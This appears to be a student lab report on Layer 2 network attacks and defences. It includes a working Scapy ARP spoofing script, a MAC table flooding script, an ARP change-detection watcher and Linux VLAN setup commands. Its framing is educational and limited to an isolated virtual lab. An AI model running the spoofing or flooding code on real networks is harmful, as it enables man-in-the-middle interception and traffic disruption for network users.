Experiment 1: ARP SPOOFING

ARP spoofing, also known as ARP poisoning, is a network attack technique where a
malicious actor sends falsified ARP (Address Resolution Protocol) messages over a local
area network. The goal is to associate the attacker’s MAC address with the IP address
of another device, typically the gateway or a target machine. Once successful, this allows
the attacker to intercept, modify, or block data intended for that IP address, effectively
positioning themselves as a ”man-in-the-middle.” ARP spoofing is commonly used in
network sniffing, session hijacking, and denial-of-service attacks. While it highlights vul-
nerabilities in the ARP protocol, such attacks should only be performed in controlled
environments for educational or authorized testing purposes.
To safely test the ARP spoofing script, it’s recommended to use a virtualized environ-
ment such as VirtualBox. Set up two virtual machines: one as the attacker running
the spoofing script, and the other as the victim. Both VMs should be connected to the
same network using either an ”Internal Network” or ”Bridged Adapter” setting in Vir-
tualBox, ensuring they’re on the same subnet. After verifying connectivity with basic
ping tests, the script can be executed on the attacker VM to observe its effects, such as
changes in the ARP table on the victim. This setup provides a controlled and isolated
environment to study ARP spoofing behavior without risking disruption to real networks.

# Page - 38
sudo python3 arp_spoof . py wlx5cffff4db90d

#!/usr/bin/env python3
import sys
from scapy.all import sniff, sendp, ARP, Ether
if len(sys.argv) < 2:
print(sys.argv[0] + " <iface>")
sys.exit(0)

def arp_poison_callback(packet):
# Got ARP request?
if ARP in packet and packet[ARP].op == 1:
answer = Ether(dst=packet[ARP].hwsrc) / ARP()
answer[ARP].op = "is-at"
answer[ARP].hwdst = packet[ARP].hwsrc
answer[ARP].psrc = packet[ARP].pdst
answer[ARP].pdst = packet[ARP].psrc

print("Fooling " + packet[ARP].psrc + " that " +

packet[ARP].pdst + " is me")
sendp(answer, iface=sys.argv[1], verbose=0)

sniff(prn=arp_poison_callback,
filter="arp",
iface=sys.argv[1],
store=0)

1
Output of Experiment 1

2
Experiment 2: ARP WATCHER

The ARP Watcher script is a network monitoring tool designed to detect changes in the
local network’s ARP (Address Resolution Protocol) table, which can indicate suspicious
activity such as ARP spoofing. By passively listening to ARP traffic on a specified net-
work interface, it maintains a mapping of IP addresses to MAC addresses. If a known
IP suddenly maps to a different MAC address, the script flags this change and prints a
warning to the screen, helping identify potential attacks or device reassignments. It also
logs new devices as they appear on the network and saves the current ARP table to a file
upon shutdown, allowing for persistence across sessions. This script is particularly useful
for network administrators and security researchers who want a lightweight and real-time
way to observe ARP-level anomalies.

# Page - 39
python arp_watcher . py wlx5cffff4db90d

#!/usr/bin/env python3

from scapy.all import sniff, ARP

from signal import signal, SIGINT
import sys
import os

arp_watcher_db_file = "/var/cache/arp-watcher.db"
ip_mac = {}

# Save ARP table on shutdown

def sig_int_handler(signum, frame):
print("Got SIGINT. Saving ARP database...")
try:
with open(arp_watcher_db_file, "w") as f:
for ip, mac in ip_mac.items():
f.write(ip + " " + mac + "\n")
print("Done.")
except IOError:
print("Cannot write file " + arp_watcher_db_file)
sys.exit(1)

# ARP monitoring logic

def watch_arp(pkt):
if ARP in pkt and pkt[ARP].op == 2:
print(pkt[ARP].hwsrc + " " + pkt[ARP].psrc)

if ip_mac.get(pkt[ARP].psrc) is None:
print("Found new device " + pkt[ARP].hwsrc + " " + pkt[ARP].psrc)
ip_mac[pkt[ARP].psrc] = pkt[ARP].hwsrc
elif ip_mac[pkt[ARP].psrc] != pkt[ARP].hwsrc:
print(pkt[ARP].hwsrc + " has got new ip " + pkt[ARP].psrc +
" (old " + ip_mac[pkt[ARP].psrc] + ")")

3
 ip_mac[pkt[ARP].psrc] = pkt[ARP].hwsrc

# Attach SIGINT handler

signal(SIGINT, sig_int_handler)

if len(sys.argv) < 2:
print(sys.argv[0] + " <iface>")
sys.exit(0)

# Load ARP database

try:
if os.path.exists(arp_watcher_db_file):
with open(arp_watcher_db_file, "r") as fh:
for line in fh:
line = line.strip()
if line:
ip, mac = line.split(" ")
ip_mac[ip] = mac
except IOError:
print("Cannot read file " + arp_watcher_db_file)
sys.exit(1)

# Start sniffing
sniff(prn=watch_arp,
filter="arp",
iface=sys.argv[1],
store=0)

Output of Experiment 2

4
Experiment 3: MAC FLOODER

The MAC flooder script is a network testing tool that continuously generates and sends
Ethernet frames with randomized source and destination MAC and IP addresses, along
with ICMP payloads, directly onto a specified network interface. By flooding the net-
work with these spoofed packets, the script aims to overwhelm the MAC address table of
switches, potentially causing them to fail open and broadcast traffic to all ports. This can
lead to degraded network performance or allow an attacker to sniff traffic not normally
visible to them. While useful for controlled security testing and learning about Layer 2
vulnerabilities, running such a flood on a live or production network can disrupt normal
communication and should only be performed in isolated or lab environments.

# Page - 41
python mac_flooder . py wlx5cffff4db90d

#!/usr/bin/env python3

import sys
from scapy.all import Ether, IP, ICMP, RandMAC, RandIP, sendp

def main():
# Determine network interface
dev = sys.argv[1] if len(sys.argv) > 1 else "eth0"

print(f"[+] Flooding network with random ICMP packets on interface: {dev}")

# Construct a random packet (Ether + IP + ICMP)

packet = (
Ether(src=RandMAC(), dst=RandMAC()) /
IP(src=RandIP(), dst=RandIP()) /
ICMP()
)

# Continuously send packets

try:
sendp(packet, iface=dev, loop=1, verbose=False)
except KeyboardInterrupt:
print("\n[!] Stopped packet flooding.")

if __name__ == "__main__":
main()

5
Output of Experiment 3

6
Experiment 4: Let’s Play Switch

A VLAN (Virtual Local Area Network) is a logical grouping of devices on a network that
allows them to communicate as if they were on the same physical LAN, even if they are
not. VLANs are implemented at the data link layer (Layer 2) of the OSI model and
are commonly used to segment network traffic for better organization, security, and effi-
ciency. By using VLANs, network administrators can isolate traffic between departments
(e.g., HR, finance, and IT) without requiring separate physical networks. This not only
enhances security by limiting broadcast domains but also simplifies network management
and reduces congestion. VLANs are especially useful in large organizations or data cen-
ters where flexibility, scalability, and traffic control are critical.

To set up a Linux machine as a VLAN-capable switch, you can use its networking ca-
pabilities to forward traffic between VLAN interfaces, effectively allowing it to act as a
simple Layer 2 switch. This involves enabling IP forwarding, creating VLAN subinter-
faces on a physical Ethernet port (using ip commands), and using a bridge to link them.
For example, you can create multiple VLAN interfaces like eth0.10, eth0.20, etc., and
add them to a Linux software bridge (br0). The bridge then handles frame forwarding
between VLANs, simulating switch behavior. For advanced setups, you can use tools
like bridge-utils, iproute2, and optionally iptables or ebtables for filtering. While not
as efficient as hardware switches, this method is useful for lab environments, testing, or
network virtualization scenarios.

# Page - 42

# depricated command
vconfig add eno1 1
ifconfig eth0 .1 192.168.13.23 up

# modern linux use this command

ip link add link eno1 name eno1 .1 type vlan id 1
ip addr add 192.168.13.23/24 dev eno1 .1
ip link set dev eno1 .1 up

# to delete the vlan run this

ip link delete eno1 .1

7
Output of Experiment 4

8
Conclusion

These scripts collectively explore critical Layer 2 networking concepts and attacks. The
ARP spoofing script demonstrates how an attacker can manipulate ARP tables by send-
ing forged ARP responses to intercept or reroute traffic—a classic Man-in-the-Middle
attack. In contrast, the ARP watcher acts as a defensive tool by monitoring ARP traffic
and logging changes in IP-to-MAC mappings, helping detect anomalies such as spoofing
attempts. The MAC flooder floods the network switch with frames containing random-
ized MAC addresses, aiming to exhaust the switch’s MAC table and force it into hub-like
behavior, which can lead to packet sniffing. Finally, the VLAN tagging and trunk testing
code, paired with manual VLAN interface setup on Linux, shows how to construct and
send VLAN-tagged frames and even simulate Q-in-Q (double tagging). This, along with
configuring a Linux machine as a VLAN-aware node or basic switch, provides a practical
foundation for testing VLAN separation, trunking behavior, and network segmentation
attacks in a controlled environment. Together, these scripts offer both offensive and de-
fensive perspectives on Ethernet-level networking, useful for education, lab simulations,
and ethical security research.